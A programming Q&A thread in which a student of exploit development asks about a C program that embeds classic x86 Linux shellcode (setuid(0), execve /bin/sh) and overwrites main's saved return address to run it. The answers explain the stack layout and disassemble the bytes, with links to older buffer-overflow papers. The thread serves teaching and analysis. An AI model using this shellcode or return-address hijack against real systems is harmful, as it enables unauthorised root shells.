# can anyone explain this code to me?

Tags: c, stack, exploit, shellcode

### WARNING: This is an exploit. Do not execute this code.

```
//shellcode.c

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { 
    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //setret to point to the saved return
                           //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the
                             //address of the shellcode, so it executes.
}
```

can anyone give me a better explanation ?

Comment: I second what 0xA3 said. This seems very suspicious. @Abed, if you found this somewhere on your machine you should probably check carefully to see if you've been owned.

Comment: thnx Josh, I know it is an exploit, I am studying a book called Gray hat hacking,2nd edition, so don't worry I want to be a gray hat :)

Comment: @0xA3 why you don't disassemble that code before you say that. it's just giving a shell

Answer (score 25, accepted):

Apparently, this code attempts to change the stack so that when the `main` function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the `shellcode` array.

**1)** `int *ret;`

defines a variable on the stack, just beneath the `main` function's arguments.

**2)** `ret = (int *)&ret + 2;`

lets the `ret` variable point to a `int *` that is placed two `int`s above `ret` on the stack. Supposedly that's where the return address is located where the program will continue when `main` returns.

**2)** `(*ret) = (int)shellcode;`

The return address is set to the address of the `shellcode` array's contents, so that `shellcode`'s contents will be executed when `main` returns.

---

`shellcode` seemingly contains machine instructions that possibly do a system call to launch `/bin/sh`. I could be wrong on this as I didn't actually disassemble `shellcode`.

---

**P.S.:** This code is machine- and compiler-dependent and will possibly not work on all platforms.

---

**Reply to your second question:**

> *and what happens if I use
>   ret=(int)&ret +2 and why did we add 2?
>   why not 3 or 4??? and I think that int
>   is 4 bytes so 2 will be 8bytes no?*

`ret` is declared as an `int*`, therefore assigning an `int` (such as `(int)&ret`) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:

- This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is *added* and not *subtracted*: the return address lies at a higher memory address than automatic (local) variables (such as `ret`).
- From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the `ebp` register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.

Now I assume the following stack layout for your program:

```
+-------------------------+
|  function arguments     |                       |
|  (e.g. argv, argc)      |                       |  (note: the stack
+-------------------------+   <-- ss:esp + 12     |   grows downward!)
|  return address         |                       |
+-------------------------+   <-- ss:esp + 8      V
|  saved ebp register     |                       
+-------------------------+   <-- ss:esp + 4  /  ss:ebp - 0  (see code below)
|  local variable (ret)   |                       
+-------------------------+   <-- ss:esp + 0  /  ss:ebp - 4
```

At the bottom lies `ret` (which is a 32-bit integer). Above it is the saved `ebp` register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be `main`'s arguments -- `argc` and `argv` -- but these aren't important here.) When the function executes, the stack pointer points at `ret`. The return address lies 64 bits "above" `ret`, which corresponds to the `+ 2` in

```
ret = (int*)&ret + 2;
```

It is `+ 2` because `ret` is a `int*`, and an `int` is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above `(int*)&ret`... which would be the return address' location, if all the assumptions in the above paragraph are correct.

---

**Excursion:** Let me demonstrate in Intel assembly language how a C function *might* be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):

```
// first, push all function arguments on the stack in reverse order:
push  argv
push  argc

// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call  main

// (afterwards: clean up stack by removing the function arguments, e.g.:)
add   esp, 8
```

Inside main, the following might happen:

```
// create a new stack frame and make room for local variables:
push  ebp
mov   ebp, esp
sub   esp, 4

// access return address:
mov   edi, ss:[ebp+4]

// access argument 'argc'
mov   eax, ss:[ebp+8]

// access argument 'argv'
mov   ebx, ss:[ebp+12]

// access local variable 'ret'
mov   edx, ss:[ebp-4]

...

// restore stack frame and return to caller (by popping the return address)
mov   esp, ebp
pop   ebp
retf
```

***See also:** Description of the [procedure call sequence in C](http://aplawrence.com/Unix/c_calling_sequence.html) for another explanation of this topic.*

Comment: thnx man it is very good and I get but one question when you said in 2) int * that is placed, you mean the whole statement which is (int *)&ret ????

Comment: and what happens if I use 
ret=(int)&ret +2 
and why did we add 2? why not 3 or 4???
and I think that int is 4 bytes so 2 will be 8bytes no?

Comment: @kmitnick - you may additionally find my answer to another question useful in understanding why 2 was added -  http://stackoverflow.com/questions/2543725/how-to-write-a-buffer-overflow-exploit-in-gcc-windows-xp-x86/2548562#2548562

Comment: thnx stakx, it is very good explanation, +A answer, but one last thing, since ret is a pointer and if we write ret=&ret + 2  then we will get same thing or no? i understand it as you said let ret points to the address of ret + 2 , so is (int *) followed by an address mean that let ret points to that address or no??

Comment: @kmitnick: Not sure if I understand your question correctly. `&ret` would return the memory location of `ret` as a `void*`. In order to be able to "shift" the pointer to a memory location 8 bytes away from the address of `ret`, it must be converted to an `int*`. The `+2` then doesn't add the value of `2` to `ret`, but `2*sizeof(int)`.

Answer (score 19):

The actual shellcode is:

```
(gdb) x /25i &shellcode
0x804a040 <shellcode>:      xor    %eax,%eax
0x804a042 <shellcode+2>:    xor    %ebx,%ebx
0x804a044 <shellcode+4>:    mov    $0x17,%al
0x804a046 <shellcode+6>:    int    $0x80
0x804a048 <shellcode+8>:    jmp    0x804a069 <shellcode+41>
0x804a04a <shellcode+10>:   pop    %esi
0x804a04b <shellcode+11>:   mov    %esi,0x8(%esi)
0x804a04e <shellcode+14>:   xor    %eax,%eax
0x804a050 <shellcode+16>:   mov    %al,0x7(%esi)
0x804a053 <shellcode+19>:   mov    %eax,0xc(%esi)
0x804a056 <shellcode+22>:   mov    $0xb,%al
0x804a058 <shellcode+24>:   mov    %esi,%ebx
0x804a05a <shellcode+26>:   lea    0x8(%esi),%ecx
0x804a05d <shellcode+29>:   lea    0xc(%esi),%edx
0x804a060 <shellcode+32>:   int    $0x80
0x804a062 <shellcode+34>:   xor    %ebx,%ebx
0x804a064 <shellcode+36>:   mov    %ebx,%eax
0x804a066 <shellcode+38>:   inc    %eax
0x804a067 <shellcode+39>:   int    $0x80
0x804a069 <shellcode+41>:   call   0x804a04a <shellcode+10>
0x804a06e <shellcode+46>:   das    
0x804a06f <shellcode+47>:   bound  %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>:   das    
0x804a073 <shellcode+51>:   jae    0x804a0dd
0x804a075 <shellcode+53>:   add    %al,(%eax)
```

This corresponds to roughly

```
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
```

Comment: thnx Chris, Really Appreciate it:)

Comment: Did you have some automated way of converting the shellcode into ASM without manually looking it up?

Comment: This was produced by compiling the example, running gdb on the resulting executable and using `x /25i &shellcode` to disassemble it

Answer (score 15):

That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.

From that same document, **[how to code stack based exploits](http://biblio.l0t3k.net/b0f/en/htce.txt)** :

```
/* the shellcode is hex for: */
      #include <stdio.h>
       main() { 
       char *name[2]; 
       name[0] = "sh"; 
       name[1] = NULL;
       execve("/bin/sh",name,NULL);
          } 

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
         \x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
         \xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
```

The code you included causes the contents of shellcode[] to be executed, running [execve](http://linux.die.net/man/2/execve), and providing access to the shell. And the term Shellcode? From [Wikipedia](http://en.wikipedia.org/wiki/Shellcode) :

> In computer security, a shellcode is a
>   small piece of code used as the
>   payload in the exploitation of a
>   software vulnerability. It is called
>   "shellcode" because it typically
>   starts a command shell from which the
>   attacker can control the compromised
>   machine. Shellcode is commonly written
>   in machine code, but any piece of code
>   that performs a similar task can be
>   called shellcode.

Answer (score 5):

Without looking up all the actual opcodes to confirm, the `shellcode` array contains the machine code necessary to exec `/bin/sh`.  This [**shellcode**](http://en.wikipedia.org/wiki/Shellcode) is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any `null` bytes.

The code in `main()` is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the `shellcode` array executed.

See [**Smashing The Stack For Fun And Profit**](http://insecure.org/stf/smashstack.html) for a description on how shellcode such as this can be created and how it might be used.

Answer (score 0):

The string contains a series of bytes represented in hexadecimal.

The bytes encode a series of instructions  for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully *not* yours!)

The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.

Answer (score 0):

Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code  tries to execute the shellcode.

I think the shellcode tries to spawn a shell.

Answer (score 0):

This is just spawn `/bin/sh`, for example in C like `execve("/bin/sh", NULL, NULL);`